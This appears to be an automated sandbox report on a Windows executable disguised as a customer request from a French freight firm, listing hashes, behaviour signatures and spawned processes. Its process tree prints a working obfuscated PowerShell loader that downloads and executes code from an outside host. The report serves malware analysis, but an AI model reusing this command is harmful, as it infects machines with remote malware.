Analysis

  • max time kernel
    13s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    31-07-2020 10:56

General

  • Target

    Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe

  • Size

    19KB

  • MD5

    36117a183609bb6953d3f78bb45ee5b9

  • SHA1

    0d89d56bac5838a3f0854e43b42e564d290f4935

  • SHA256

    3a58855a902398680563edf448779739201772e044102fe1c733f54fa9c936c1

  • SHA512

    79ff888d369979be614821bc2f74d99aec8b24887edaea4c2b43cffe60942b87311e082bf031bf3111b70578c4814aa43eb01e09d314c776a013fc3c5df8f5c2

Score
10/10

Malware Config

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
    "C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe"
      PID:976
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -ExecutionPolicy Bypass $TRTTz='24^54^62^6F^6E^65^3D^27^2A^45^58^27^2E^72^65^70^6C^61^63^65^28^27^2A^27^2C^27^49^27^29^3B^73^61^6C^20^4D^20^24^54^62^6F^6E^65^3B^64^6F^20^7B^24^70^69^6E^67^20^3D^20^74^65^73^74^2D^63^6F^6E^6E^65^63^74^69^6F^6E^20^2D^63^6F^6D^70^20^67^6F^6F^67^6C^65^2E^63^6F^6D^20^2D^63^6F^75^6E^74^20^31^20^2D^51^75^69^65^74^7D^20^75^6E^74^69^6C^20^28^24^70^69^6E^67^29^3B^24^70^32^32^20^3D^20^5B^45^6E^75^6D^5D^3A^3A^54^6F^4F^62^6A^65^63^74^28^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^54^79^70^65^5D^2C^20^33^30^37^32^29^3B^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^72^76^69^63^65^50^6F^69^6E^74^4D^61^6E^61^67^65^72^5D^3A^3A^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^20^3D^20^24^70^32^32^3B^24^6D^76^3D^27^28^4E^27^2B^27^65^77^27^2B^27^2D^4F^27^2B^27^62^27^2B^27^6A^65^27^2B^27^63^27^2B^27^74^20^27^2B^20^27^4E^65^27^2B^27^74^2E^27^2B^27^57^27^2B^27^65^62^27^2B^27^43^27^2B^27^6C^69^27^2B^27^65^6E^74^29^27^2B^27^2E^44^27^2B^27^6F^77^27^2B^27^6E^6C^27^2B^27^6F^61^27^2B^27^64^27^2B^27^53^27^2B^27^74^72^27^2B^27^69^6E^67^28^27^27^68^74^74^70^3A^2F^2F^6D^65^72^72^69^6D^61^63^6B^2E^69^65^2F^45^30^2E^6A^70^67^27^27^29^27^7C^49^60^45^60^58^3B^24^61^73^63^69^69^43^68^61^72^73^3D^20^24^6D^76^20^2D^73^70^6C^69^74^20^27^2D^27^20^7C^46^6F^72^45^61^63^68^2D^4F^62^6A^65^63^74^20^7B^5B^63^68^61^72^5D^5B^62^79^74^65^5D^22^30^78^24^5F^22^7D^3B^24^61^73^63^69^69^53^74^72^69^6E^67^3D^20^24^61^73^63^69^69^43^68^61^72^73^20^2D^6A^6F^69^6E^20^27^27^7C^4D';$jm=$TRTTz.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
      • Blacklisted process makes network request
      • Process spawned unexpected child process
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:2020
